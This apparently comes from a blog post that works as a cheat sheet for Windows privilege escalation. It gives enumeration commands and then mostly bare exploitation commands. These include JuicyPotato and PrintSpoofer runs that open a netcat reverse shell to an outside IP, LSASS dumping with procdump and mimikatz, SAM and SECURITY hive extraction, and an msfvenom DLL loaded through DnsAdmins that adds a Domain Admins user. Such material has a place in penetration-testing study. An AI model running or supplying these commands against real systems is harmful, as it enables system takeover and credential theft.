Windows Privilege Escalation — Deep Dive

This blog covers Windows Privilege Escalation techniques, enumeration commands, and exploitation paths for common privileges such as SeImpersonatePrivilege, SeDebugPrivilege, SeTakeOwnershipPrivilege, Backup Operators, DnsAdmins, and more.

1. Gathering Information of the System

Network & System Information

Network Configuration:

ipconfig /all
arp -a
route print
  

Service Information:

tasklist /svc
netstat -ano
  

System Info:

systeminfo
wmic product get name
Get-WmiObject -Class Win32_Product | select Name, Version
  

2. User & Privilege Enumeration

Current User & Privileges:

whoami /priv
whoami /groups
net user
query user
  

Groups & Password Policies:

net localgroup
net localgroup "Backup Operators"
net accounts
  

3. Security Tools & Configuration

Windows Defender:

Get-MpComputerStatus
  

AppLocker:

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Test-AppLockerPolicy -Path C:\Windows\System32\cmd.exe -User Everyone
  

4. Named Pipes & Permission Enumeration

List Named Pipes:

pipelist.exe /accepteula
  

Check Access Rights:

accesschk.exe /accepteula \\.\Pipe\lsass -v
accesschk.exe /accepteula -w \\.\Pipe\SQLLocal\SQLEXPRESS01 -v
  

5. Environment Variables & Useful Commands

set
  

User Privileges

whoami /priv
  

Critical privileges to look for:

• SeBackupPrivilege
• SeRestorePrivilege
• SeTakeOwnershipPrivilege
• SeImpersonatePrivilege
• SeDebugPrivilege

Exploiting SeImpersonatePrivilege

Check privilege:

whoami /priv
  

1. JuicyPotato Exploit

nc -lnvp 8443

JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *
  

2. PrintSpoofer

PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"
  

Exploiting SeDebugPrivilege

Check privilege:

whoami /priv
  

1. Dumping LSASS

procdump.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
  

2. RCE via SYSTEM Token (psgetsystem)

tasklist
. .\psgetsys.ps1
ImpersonateFromParentPid -ppid 612 -command "cmd.exe"
  

Exploiting SeTakeOwnershipPrivilege

takeown /F C:\Windows\System32\drivers\etc\hosts
icacls C:\Windows\System32\drivers\etc\hosts /grant user:F
  

Registry takeover example:

Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "key" -Value "value"
  

Group Privileges

Administrators Group

net localgroup administrators
  

Backup Operators

reg save hklm\sam c:\temp\sam
reg save hklm\system c:\temp\system
reg save hklm\security c:\temp\security
  

DnsAdmins Exploitation

msfvenom -p windows/x64/exec cmd='net group "Domain Admins" netadm /add /domain' -f dll -o adduser.dll

dnscmd.exe /config /serverlevelplugindll adduser.dll
sc.exe stop dns
sc.exe start dns